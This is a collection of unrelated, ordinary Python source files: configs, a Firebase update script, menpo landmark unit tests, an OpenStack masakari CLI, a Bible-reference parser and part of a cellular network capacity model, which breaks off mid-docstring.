celery.conf.CELERY_IMPORTS = ['task.all_task', # 'task.default.task_init', # 默认启动任务 'task.monitor.base', # 基础监控任务 'task.monitor.server', # 业务监控任务 'task.monitor.tpm' # 第三方组件监控任务 ] return celery, BROKER DATE_FORMATE = "%Y-%m-%d %H:%M:%S" # Copy this to config.py and update necessary values # Spotify Username username = "CHANGE_ME" # Spotify Authentication Scopes scope = "playlist-read-private playlist-modify-private playlist-modify-public" # Spotify Application Details client_id = "CHANGE_ME" client_secret = "CHANGE_ME" redirect_uri = "http://localhost:65000" # Genres on Beatport ("Arbitrary name": "URL path for genre") genres = { "All Genres": "", "140 / Deep Dubstep / Grime": "140-deep-dubstep-grime/95", "Afro House": "afro-house/89", "Bass / Club": "bass-club/85", "Bass House": "bass-house/91", "Breaks / Breakbeat / UK Bass": "breaks-breakbeat-uk-bass/9", "Dance / Electro Pop": "dance-electro-pop/39", "Deep House": "deep-house/12", "DJ Tools": "dj-tools/16", "Drum & Bass": "drum-bass/1", "Dubstep": "dubstep/18", "Electro (Classic / Detroit / Modern)": "electro-classic-detroit-modern/94", "Electronica": "electronica/3", "Funky / Groove / Jackin' House": "funky-groove-jackin-house/81", "Hard Dance / Hardcore": "hard-dance-hardcore/8", "Hard Techno": "hard-techno/2", "House": "house/5", "Indie Dance": "indie-dance/37", "Mainstage": "mainstage/96", "Melodic House & Techno": "melodic-house-techno/90", "Minimal / Deep Tech": "minimal-deep-tech/14", "Nu Disco / Disco": "nu-disco-disco/50", "Organic House / Downtempo": "organic-house-downtempo/93", "Progressive House": "progressive-house/15", "Psy-Trance": "psy-trance/13", "Tech House": "tech-house/11", "Techno (Peak Time / Driving)": "techno-peak-time-driving/6", "Techno (Raw / Deep / Hypnotic)": "techno-raw-deep-hypnotic/92", "Trance": "trance/7", "Trap / Wave": "trap-wave/38", "UK Garage / Bassline": "uk-garage-bassline/86" } # TwilioQuest version 3.1.26 # Works in: # 3.1.26 # bog standard main function def main(): print("functions") hail_friend() print("function arguments") hail_friend("Operator") print("function return values") print(f"{add_numbers(45, -1)}") # functions the tasks demand def add_numbers(num1, num2): return num1 + num2 def hail_friend(name=None): # use default value to pass Function challenge if (None == name): print("Hail, friend!") else: # use given value to pass argument challenge print(f"Hail, {name}!") # standard main guard if ("__main__" == __name__): main() SeanMabli/aiinpy0 import firebase_admin from firebase_admin import firestore from getadminkey import getadminkey adminkey = getadminkey() cred = firebase_admin.credentials.Certificate(adminkey) firebase_admin.initialize_app(cred) db = firestore.client() for doc in db.collection('documentation').stream(): if doc.to_dict()['version'] == '0.0.18': doc.reference.update({'equation' : 'y = x^2', 'equationderivative' : 'y = 2x', 'examples' : 'placeholder', 'graphx' : [], 'graphy' : [], 'parameters' : 'placeholder'}) fast_carpenter/data_import/_uproot3.py from typing import Any, Dict, List from ._base import DataImportBase class Uproot3DataImport(DataImportBase): """ This class is a wrapper around the uproot3 library. """ def __init__(self, config: Dict[str, Any]) -> None: super().__init__(config) def _process_config(self): pass def open(self, paths: List[str]) -> Any: """ This method is called by the importer to open the file. """ import uproot3 if len(paths) != 1: # TODO - support multiple paths raise AttributeError("Multiple paths not yet supported") # Try to open the tree - some machines have configured limitations # which prevent memmaps from begin created. Use a fallback - the # localsource option input_file = paths[0] try: rootfile = uproot3.open(input_file) except MemoryError: rootfile = uproot3.open(input_file, localsource=uproot3.FileSource.defaults) return rootfile yuxiang-zhou/menpo from collections import OrderedDict import numpy as np from nose.tools import assert_equal, raises from numpy.testing import assert_allclose from menpo.landmark import LandmarkGroup, LandmarkManager from menpo.shape import PointCloud from menpo.testing import is_same_array def test_LandmarkGroup_copy_true(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict) assert (not is_same_array(lgroup.lms.points, points)) assert (lgroup._labels_to_masks is not mask_dict) assert (lgroup.lms is not pcloud) def test_LandmarkGroup_copy_false(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert (is_same_array(lgroup._pointcloud.points, points)) assert (lgroup._labels_to_masks is mask_dict) assert (lgroup.lms is pcloud) def test_LandmarkManager_set_LandmarkGroup(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) man = LandmarkManager() man['test_set'] = lgroup assert (not is_same_array(man['test_set'].lms.points, lgroup.lms.points)) assert_allclose(man['test_set']['all'].points, np.ones([10, 3])) assert (man['test_set']._labels_to_masks is not lgroup._labels_to_masks) @raises(ValueError) def test_LandmarkManager_set_None_key(): pcloud = PointCloud(np.ones((10, 3)), copy=False) lgroup = LandmarkGroup.init_with_all_label(pcloud) man = LandmarkManager() man[None] = lgroup def test_LandmarkManager_set_pointcloud(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud lgroup = man['test_set'] assert (lgroup.lms is not pcloud) assert_allclose(lgroup._labels_to_masks['all'], np.ones(10, dtype=np.bool)) def test_landmarkgroup_copy_method(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) lgroup_copy = lgroup.copy() assert (not is_same_array(lgroup_copy.lms.points, lgroup.lms.points)) # Check the mask dictionary is deepcopied properly assert (lgroup._labels_to_masks is not lgroup_copy._labels_to_masks) masks = zip(lgroup_copy._labels_to_masks.values(), lgroup._labels_to_masks.values()) for ms in masks: assert (ms[0] is not ms[1]) def test_LandmarkManager_copy_method(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud man_copy = man.copy() assert (man_copy['test_set'] is not man['test_set']) assert (not is_same_array(man_copy['test_set'].lms.points, man['test_set'].lms.points)) def test_LandmarkManager_set_PointCloud_not_copy_target(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud assert (not is_same_array(man['test_set'].lms.points, pcloud.points)) assert_allclose(man['test_set']['all'].points, np.ones([10, 3])) def test_LandmarkManager_iterate(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) target = PointCloud(points) man = LandmarkManager() man['test_set'] = pcloud for l in man: assert_equal(l, 'test_set') def test_LandmarkGroup_iterate(): points = np.ones((10, 3)) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) pcloud = PointCloud(points, copy=False) target = PointCloud(points) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) for l in lgroup: assert_equal(l, 'all') def test_LandmarkManager_get(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) man = LandmarkManager() man._landmark_groups['test_set'] = lgroup assert(man['test_set'] is lgroup) def test_LandmarkManager_set(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) man = LandmarkManager() man['test_set'] = lgroup assert_allclose(man._landmark_groups['test_set'].lms.points, lgroup.lms.points) assert_equal(man._landmark_groups['test_set'].n_labels, 1) def test_LandmarkManager_del(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) target = PointCloud(points) man = LandmarkManager() man['test_set'] = pcloud del man['test_set'] assert_equal(man.n_groups, 0) def test_LandmarkManager_in(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud assert ('test_set' in man) def test_LandmarkGroup_get(): points = np.ones((3, 2)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict( [('lower', np.array([1, 1, 0], dtype=np.bool)), ('upper', np.array([0, 0, 1], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert_allclose(lgroup['lower'].n_points, 2) assert_allclose(lgroup['upper'].n_points, 1) def test_LandmarkGroup_in(): points = np.ones((3, 2)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert ('all' in lgroup) def test_LandmarkGroup_set(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) lgroup['lower'] = [0, 1] assert_allclose(lgroup['lower'].n_points, 2) assert_allclose(lgroup['lower'].points[0, :], [0, 1]) assert_allclose(lgroup['lower'].points[1, :], [2, 3]) def test_LandmarkGroup_set_ordered_labels(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) lgroup['lower'] = [0, 1] assert_allclose(lgroup['lower'].n_points, 2) assert_allclose(lgroup['lower'].points[0, :], [0, 1]) assert_allclose(lgroup['lower'].points[1, :], [2, 3]) def test_LandmarkGroup_del(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool)), ('lower', np.array([1, 1, 0], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) del lgroup['lower'] assert ('all' in lgroup) assert ('lower' not in lgroup) @raises(ValueError) def test_LandmarkGroup_del_unlabelled(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool)), ('lower', np.array([1, 1, 0], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) del lgroup['all'] @raises(ValueError) def test_LandmarkGroup_create_unlabelled(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.zeros(3, dtype=np.bool))]) LandmarkGroup(pcloud, mask_dict, copy=False) @raises(ValueError) def test_LandmarkGroup_pass_non_ordered_dict(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = {'all': np.ones(3, dtype=np.bool)} LandmarkGroup(pcloud, mask_dict, copy=False) @raises(ValueError) def test_LandmarkGroup_create_no_mask(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) LandmarkGroup(pcloud, None, copy=False) @raises(ValueError) def test_LandmarkGroup_create_incorrect_shape(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict(['all', np.ones(5, dtype=np.bool)]) LandmarkGroup(pcloud, mask_dict, copy=False) def test_LandmarkGroup_with_labels(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('lower', np.array([1, 1, 0], dtype=np.bool)), ('upper', np.array([0, 0, 1], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) new_lgroup = lgroup.with_labels('lower') assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) new_lgroup = lgroup.with_labels(['lower']) assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) def test_LandmarkGroup_without_labels(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('lower', np.array([1, 1, 0], dtype=np.bool)), ('upper', np.array([0, 0, 1], dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) new_lgroup = lgroup.without_labels('upper') assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) new_lgroup = lgroup.without_labels(['upper']) assert_equal(new_lgroup.n_labels, 1) assert_equal(new_lgroup.n_landmarks, 2) assert ('lower' in new_lgroup) def test_LandmarkManager_str(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) man = LandmarkManager() man['test_set'] = pcloud out_str = man.__str__() assert (len(out_str) > 0) def test_LandmarkGroup_str(): points = np.array([[0, 1], [2, 3], [4, 5]]) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(3, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) out_str = lgroup.__str__() assert (len(out_str) > 0) def test_LandmarkGroup_get_None(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) mask_dict = OrderedDict([('all', np.ones(10, dtype=np.bool))]) lgroup = LandmarkGroup(pcloud, mask_dict, copy=False) assert lgroup[None] is not pcloud assert_allclose(lgroup[None].points, pcloud.points) def test_LandmarkGroup_create_with_all_label(): points = np.ones((10, 3)) pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup.init_with_all_label(pcloud, copy=False) assert lgroup.n_labels == 1 assert 'all' in lgroup def test_LandmarkGroup_has_nan_values(): points = np.ones((10, 3)) points[0, 0] = np.nan pcloud = PointCloud(points, copy=False) lgroup = LandmarkGroup.init_with_all_label(pcloud, copy=False) assert lgroup.has_nan_values() 1-10 # Copyright(c) 2016 Nippon Telegraph and Telephone Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from openstack import exceptions as sdk_exc from osc_lib.command import command from osc_lib import exceptions from osc_lib import utils from oslo_serialization import jsonutils from masakariclient import api_versions from masakariclient.common.i18n import _ import masakariclient.common.utils as masakariclient_utils class ListNotification(command.Lister): """List notifications.""" def get_parser(self, prog_name): parser = super(ListNotification, self).get_parser(prog_name) parser.add_argument( '--limit', metavar='', help=_('Limit the number of notifications returned') ) parser.add_argument( '--marker', metavar='', help=_('Only return notifications that appear after the given ' 'notification ID') ) parser.add_argument( '--sort', metavar='[:]', help=_("Sorting option which is a string containing a list of " "keys separated by commas. Each key can be optionally " "appended by a sort direction (:asc or :desc). The valid " "sort keys are: ['type', 'created_at', 'updated_at']") ) parser.add_argument( '--filters', metavar='<"key1=value1;key2=value2...">', help=_("Filter parameters to apply on returned notifications. " "This can be specified multiple times, or once with " "parameters separated by a semicolon. The valid filter " "keys are: ['source_host_uuid', 'type', 'status', " "generated-since]"), action='append' ) return parser def take_action(self, parsed_args): masakari_client = self.app.client_manager.ha columns = ['notification_uuid', 'generated_time', 'status', 'type', 'source_host_uuid', 'payload'] queries = masakariclient_utils.format_sort_filter_params(parsed_args) notifications = masakari_client.notifications(**queries) formatters = {} return ( columns, (utils.get_item_properties(p, columns, formatters=formatters) for p in notifications) ) class ShowNotification(command.ShowOne): """Show notification details.""" def get_parser(self, prog_name): parser = super(ShowNotification, self).get_parser(prog_name) parser.add_argument( 'notification', metavar='', help='UUID of notification to display', ) return parser def take_action(self, parsed_args): masakari_client = self.app.client_manager.ha return _show_notification(masakari_client, notification_uuid=parsed_args.notification) class CreateNotification(command.ShowOne): """Create notification.""" def get_parser(self, prog_name): parser = super(CreateNotification, self).get_parser(prog_name) parser.add_argument( 'type', metavar='', choices=['COMPUTE_HOST', 'VM', 'PROCESS'], help=_('Type of failure. The supported options are: ' 'COMPUTE_HOST, VM, PROCESS.') ) parser.add_argument( 'hostname', metavar='', help=_('Hostname of notification.') ) parser.add_argument( 'generated_time', metavar='', help=_('Timestamp for notification. e.g. 2016-01-01T01:00:00.000') ) parser.add_argument( 'payload', metavar='', help=_('JSON string about failure event.') ) return parser def take_action(self, parsed_args): masakari_client = self.app.client_manager.ha payload = jsonutils.loads(parsed_args.payload) attrs = { 'type': parsed_args.type, 'hostname': parsed_args.hostname, 'generated_time': parsed_args.generated_time, 'payload': payload, } notification = masakari_client.create_notification(**attrs) return _show_notification(masakari_client, notification.notification_uuid) def _show_notification(masakari_client, notification_uuid): try: notification = masakari_client.get_notification(notification_uuid) except sdk_exc.ResourceNotFound: raise exceptions.CommandError(_('Notification not found: %s' ) % notification_uuid) formatters = {} columns = [ 'created_at', 'updated_at', 'notification_uuid', 'type', 'status', 'source_host_uuid', 'generated_time', 'payload' ] if masakari_client.default_microversion: api_version = api_versions.APIVersion( masakari_client.default_microversion) if api_version >= api_versions.APIVersion("1.1"): columns.append('recovery_workflow_details') return columns, utils.get_dict_properties(notification.to_dict(), columns, formatters=formatters) # encoding=utf-8 import re RE_BOOK = re.compile(r""" ((\d\s)?[А-Я][а-я]+)\.?\s* # book short title (,\s*\d+\s*зач\.\s*(\([^\)]+\))?)?,?\s* # text before chapter ([IVXL]+)[^А-Яа-я\.\<\>\(\)]+[.;,]? # chapter with lines """, re.VERBOSE) # using [^IVXL] due to possibility of unknown unicode range symbol RE_CHAPTER = re.compile(r""" ((([IVXL]+),\s*([^IVXL]+)([IVXL]+),\s*(.+)) # type 1: chapter's range | ([IVXL]+),([^\<\>\(\)]+)) # type 2: chapter lines """, re.VERBOSE) # using . instead of - due to possibility of unknown unicode range symbol RE_CHAPTER_LINE_RANGE = re.compile(r"(\d+)\s*.\s*(\d+)") RE_LINE_INT = re.compile(r"(\d+)") def rim2arab(num): """Convert Latin numbers to Arabic: L - 50 X - 10 V - 5 I - 1 :type num: str :rtype: int """ res = 0 lt = False ltx = False for c in num: if c == "L": if ltx: res += 30 else: res += 50 lt = False ltx = False elif c == "X": if lt: res += 8 else: res += 10 lt = False ltx = True elif c == "V": if lt: res += 3 else: res += 5 lt = False ltx = False elif c == "I": res += 1 lt = True ltx = False return res class RefBook: """Each bible book must have book short title and one or set of chapters. Each chapter is presented by sequence of lines: VII, 1-3, 5-8, 9, 10 Book instance chapters are list of dict like: {"chapter__num": int, "num__gte": int, "num__lte": int} which can be used directly in Django model's filters """ def __init__(self, book, chapters=None): self.book = book self.chapters = chapters or [] self.chapters_query = None def __str__(self): return "book={}, chapters={}".format(self.book, self.chapters) def __eq__(self, other): if isinstance(other, RefBook): res = (self.book == other.book and len(self.chapters) == len(other.chapters)) if res: for i, ch in enumerate(self.chapters): res = res and ch == other.chapters[i] if not res: break return res return False def __parse_lines(self, chapter, lines, range_start=False, range_end=False): """Parsing sequence of lines numbers separated by ','. It can be single lines (int) or ranges (int - int). For chapter's range: If chapter's range start line sequence ends with single line all lines greater then this line should be taken. If chapter's range end line sequence starts with single line all lines less then this line should be taken. :range_start: should be num__gte :range_end: should be num__lte """ _arr = lines.split(",") _arr_len = len(_arr) _num_postfix = "" if range_start: _num_postfix = "__gte" elif range_end: _num_postfix = "__lte" for i, lq in enumerate(_arr): _lines = lq.replace(".", "").strip() if not _lines: continue _m = RE_CHAPTER_LINE_RANGE.match(_lines) if _m: # line is a range: ls = _m.group(1) le = _m.group(2) self.chapters.append( { "chapter__num": chapter, "num__gte": int(ls), "num__lte": int(le) } ) else: # line is a single int: _m = RE_LINE_INT.search(_lines) if _m: ln = int(_m.group(1)) _num = "num" if _num_postfix: if (i == _arr_len - 1 and range_start or i == 0 and range_end): _num += _num_postfix _num_postfix = "" self.chapters.append( {"chapter__num": chapter, _num: ln} ) else: print("[ERROR]: Can't parse chapter lines: {}" .format(_lines)) continue def parse_chapters(self, line): """Chapters are presented by sequence of latin numbers with line sequences separated by ';'. To keep spaces for endpos calculating chapter pattern should not be stripped. """ self.chapters_query = line endpos = line.count(";") for chapter in line.split(";"): if not chapter.strip(): continue m = RE_CHAPTER.search(chapter) if not m: continue endpos += m.end() _parsed = m.groups() if _parsed[-1]: # type 2: ch = rim2arab(_parsed[-2]) self.__parse_lines(ch, _parsed[-1]) else: # type 1: ch1, _lines1, ch2, _lines2 = _parsed[2:6] arab_ch1 = rim2arab(ch1) arab_ch2 = rim2arab(ch2) self.__parse_lines(arab_ch1, _lines1, range_start=True) for ch in range(arab_ch1+1, arab_ch2): self.chapters.append({"chapter__num": ch}) self.__parse_lines(arab_ch2, _lines2, range_end=True) return endpos class MatchBook: def __init__(self, line, start=0, endpos=0, book=None): self.line = line self.start = start self.endpos = endpos self.book = book def __str__(self): return "span=({}:{}), {}".format(self.start, self.endpos, self.book) def __eq__(self, other): if isinstance(other, MatchBook): return (self.start == other.start and self.endpos == other.endpos and self.book == other.book) return False @property def match(self): return self.line[self.start:self.endpos] class RefParser: """Parse Bible reference patterns into a list of MatchBooks """ def __init__(self, line=None): self.refs = [] if line: self.parse(line) def parse(self, line): for m in RE_BOOK.finditer(line): _line = line[m.start():m.end()] # cutting prefix text: _start = _line.index(m.group(5)) book = RefBook(m.group(1)) endpos = m.start() + _start + book.parse_chapters(_line[_start:m.end()]) if book.chapters: self.refs.append( MatchBook(line, start=m.start(), endpos=endpos, book=book) ) """Cambridge Communications Assessment Model """ from collections import defaultdict from itertools import tee class NetworkManager(object): """Model controller class. Represents lower level statistical units (postcode sectors) nested within upper level statistical units (local area districts), with all affiliated assets, capacities and clutter types. Parameters ---------- lads: :obj:`list` of :obj:`dict` List of local area districts * id: :obj:`int` Unique ID * name: :obj:`str` Name of the LAD pcd_sectors: :obj:`list` of :obj:`dict` List of postcode sectors (pcd) * id: :obj:`str` Postcode name * lad_id: :obj:`int` Unique ID * population: :obj:`int` Number of inhabitants * area: :obj:`float` Areas size in square kilometers (km²) * user_throughput: :obj:`int` Per user monthly data demand in gigabytes (GB) assets: :obj:`list` of :obj:`dict` List of assets * pcd_sector: :obj:`str` Code of the postcode sector * site_ngr: :obj:`int` Unique site reference number * technology: :obj:`str` Abbreviation of the asset technology (LTE, 5G etc.) * frequency: :obj:`str` Spectral frequency(s) the asset operates at (800, 2600, ..) * type: :obj:`str` The type of cell site (macrocell site, small cell site...) * build_date: :obj:`int` Build year of the asset capacity_lookup_table: dict Dictionary that represents the clutter/asset type, spectrum frequency and channel bandwidth, and the consequential cellular capacity provided for different asset densities. * key: :obj:`tuple` * 0: :obj:`str` Area type ('urban', 'suburban' or 'rural') or asset type ('small_cells') * 1: :obj:`str` Frequency of the asset configuration (800, 2600, ..) * 2: :obj:`str` Bandwith of the asset configuration (10, 40, ..) * 3: :obj:`str` Technology generation (4G, 5G) * value: :obj:`list` of :obj:`tuple` * 0: :obj:`int` Site asset density per square kilometer (sites per km²) * 1: :obj:`int` Mean Cell Edge capacity in Mbps per square kilometer (Mbps/km²) clutter_lookup: list of tuples Each element represents the settlement definitions for urban, suburban and rural by population density in square kilometers (persons per km²) * 0: :obj:`int` Population density in persons per km². * 1: :obj:`string` Settlement type (urban, suburban and rural) simulation_parameters: dict Contains all simulation parameters, set in the run script. * market_share: :obj:`int` Percentage market share of the modelled hypothetical operator. * annual_budget: :obj:`int` Annual budget to spend. * service_obligation_capacity: :obj:`int` Required service obligation. * busy_hour_traffic_percentage: :obj:`int` Percentage of daily traffic taking place in the busy hour. * coverage_threshold: :obj:`int` The threshold we wish to measure the served population against. * penetration: :obj:`int` The penetration of users with smartphone and data access. * channel_bandwidth: :obj:`int` Carrier bandwidth by frequency. * macro_sectors: :obj:`int` Number of sectors per macrocell. * small-cell_sectors: :obj:`int` Number of sectors per small cell. * mast_height: :obj:`int` Mast height for the sites being assessed. """ def __init__(self, lads, pcd_sectors, assets, capacity_lookup_table, clutter_lookup, simulation_parameters): self.lads = {} self.postcode_sectors = {} for lad_data in lads: lad_id = lad_data["id"] self.lads[lad_id] = LAD(lad_data, simulation_parameters) assets_by_pcd = defaultdict(list) for asset in assets: assets_by_pcd[asset['pcd_sector']].append(asset) for pcd_sector_data in pcd_sectors: try: lad_id = pcd_sector_data["lad_id"] pcd_sector_id = pcd_sector_data["id"] assets = assets_by_pcd[pcd_sector_id] pcd_sector = PostcodeSector(pcd_sector_data, assets, capacity_lookup_table, clutter_lookup, simulation_parameters) self.postcode_sectors[pcd_sector_id] = pcd_sector lad_containing_pcd_sector = self.lads[lad_id] lad_containing_pcd_sector.add_pcd_sector(pcd_sector) except: print('could not create object for {}'.format(pcd_sector_data["id"])) pass class LAD(object): """Local area district - Higher level statistical unit. Represents an area to be modelled. Contains data for demand characterisation and assets for supply assessment. Arguments --------- data: dict Metadata and info for the LAD * id: :obj:`int` Unique ID * name: :obj:`str` Name of the LAD simulation_parameters: dict Contains all simulation parameters, set in the run script. * market_share: :obj:`int` Percentage market share of the modelled hypothetical operator. * annual_budget: :obj:`int` Annual budget to spend. * service_obligation_capacity: :obj:`int` Required service obligation. * busy_hour_traffic_percentage: :obj:`int` Percentage of daily traffic taking place in the busy hour. * coverage_threshold: :obj:`int` The threshold we wish to measure the served population against. * penetration: :obj:`int` The penetration of users with smartphone and data access. * channel_bandwidth: :obj:`int` Carrier bandwidth by frequency. * macro_sectors: :obj:`int` Number of sectors per macrocell. * small-cell_sectors: :obj:`int` Number of sectors per small cell. * mast_height: :obj:`int` Mast height for the sites being assessed. """ def __init__(self, data, simulation_parameters): self.id = data["id"] self.name = data["name"] self._pcd_sectors = {} def __repr__(self): return "".format(self.id, self.name) @property def population(self): return sum([ pcd_sector.population for pcd_sector in self._pcd_sectors.values()]) @property def area(self): return sum([ pcd_sector.area for pcd_sector in self._pcd_sectors.values()]) @property def population_density(self): total_area = sum([ pcd_sector.area for pcd_sector in self._pcd_sectors.values()]) if total_area == 0: return 0 else: return self.population / total_area def add_pcd_sector(self, pcd_sector): self._pcd_sectors[pcd_sector.id] = pcd_sector def demand(self): """Return the mean demand (Mbps km²) from all nested postcode sectors. """ if not self._pcd_sectors: return 0 summed_demand = sum( pcd_sector.demand * pcd_sector.area for pcd_sector in self._pcd_sectors.values() ) summed_area = sum( pcd_sector.area for pcd_sector in self._pcd_sectors.values() ) return summed_demand / summed_area def capacity(self): """Return the mean capacity (Mbps km²) for all nested postcode sectors. """ if not self._pcd_sectors: return 0 summed_capacity = sum([ pcd_sector.capacity for pcd_sector in self._pcd_sectors.values()]) return summed_capacity / len(self._pcd_sectors) def coverage(self, simulation_parameters): """Return proportion of population with coverage over a threshold (e.g. 10 Mbps). """ if not self._pcd_sectors: return 0 threshold = simulation_parameters['coverage_threshold'] population_with_coverage = sum([ pcd_sector.population for pcd_sector in self._pcd_sectors.values() if pcd_sector.capacity >= threshold]) total_pop = sum([ pcd_sector.population for pcd_sector in self._pcd_sectors.values()]) return float(population_with_coverage) / total_pop class PostcodeSector(object): """Postcode Sector - Lower level statistical unit. Represents an area to be modelled. Contains data for demand characterisation and assets for supply assessment. Arguments --------- data: dict Metadata and info for the LAD * id: :obj:`int` Unique ID. * lad_id: :obj:`int` The Local Authority District which this area is within. * population: :obj:`int` Number of inhabitants. * area: :obj:`int` Geographic area (km²). * user_throughput: :obj:`int` Monthly user data consumption (GB). * population: :obj:`int` Number of inhabitants. * area: :obj:`int` Geographic area (km²). assets: :obj:`list` of :obj:`dict` List of assets * pcd_sector: :obj:`str` Code of the postcode sector * site_ngr: :obj:`int` Unique site reference number * technology: :obj:`str` Abbreviation of the asset technology (LTE, 5G etc.) * frequency: :obj:`str` Spectral frequency(s) the asset operates at (800, 2600, ..) * type: :obj:`str` The type of cell site (macrocell site, small cell site...) * build_date: :obj:`int` Build year of the asset capacity_lookup_table: dict Dictionary that represents the clutter/asset type, spectrum frequency and channel bandwidth, and the consequential cellular capacity provided for different asset densities. * key: :obj:`tuple` * 0: :obj:`str` Area type ('urban', 'suburban' or 'rural') or asset type ('small_cells') * 1: :obj:`str` Frequency of the asset configuration (800, 2600, ..) * 2: :obj:`str` Bandwith of the asset configuration (10, 40, ..) * 3: :obj:`str` Technology generation (4G, 5G) * value: :obj:`list` of :obj:`tuple` * 0: :obj:`int` Site asset density per square kilometer (sites per km²) * 1: :obj:`int` Mean Cell Edge capacity in Mbps per square kilometer (Mbps/km²) clutter_lookup: list of tuples Each element represents the settlement definitions for urban, suburban and rural by population density in square kilometers (persons per km²) * 0: :obj:`int` Population density in persons per km². * 1: :obj:`string` Settlement type (urban, suburban and rural) simulation_parameters: dict Contains all simulation parameters, set in the run script. * market_share: :obj:`int` Percentage market share of the modelled hypothetical operator. * busy_hour_traffic_percentage: :obj:`int` Percentage of daily traffic taking place in the busy hour. * penetration: :obj:`int` The penetration of users with smartphone and data access. """ def __init__(self, data, assets, capacity_lookup_table, clutter_lookup, simulation_parameters): self.id = data["id"] self.lad_id = data["lad_id"] self.population = data["population"] self.area = data["area_km2"] self.user_throughput = data["user_throughput"] self.penetration = simulation_parameters['penetration'] self.busy_hour_traffic = simulation_parameters['busy_hour_traffic_percentage'] self.overbooking_factor = simulation_parameters['overbooking_factor'] self.market_share = simulation_parameters['market_share'] self.user_demand = self._calculate_user_demand( self.user_throughput, simulation_parameters) self.demand_density = self.demand / self.area self._capacity_lookup_table = capacity_lookup_table self._clutter_lookup = clutter_lookup self.clutter_environment = lookup_clutter_geotype( self._clutter_lookup, self.population_density ) self.assets = assets self.site_density_macrocells = self._calculate_site_density_macrocells() self.site_density_small_cells = self._calculate_site_density_small_cells() self.capacity = ( self._macrocell_site_capacity(simulation_parameters) + self.small_cell_capacity(simulation_parameters) ) def __repr__(self): return "".format(self.id) @property def demand(self): """ Estimate total demand based on: - population - overbooking factor - smartphone penetration - market share - user demand - area E.g.:: 2000 population / 20 * (80% / 100) penetration * (25% / 100) market share = 20 users 20 users * 0.01 Mbps user demand = 0.2 total user throughput 0.2 Mbps total user throughput during 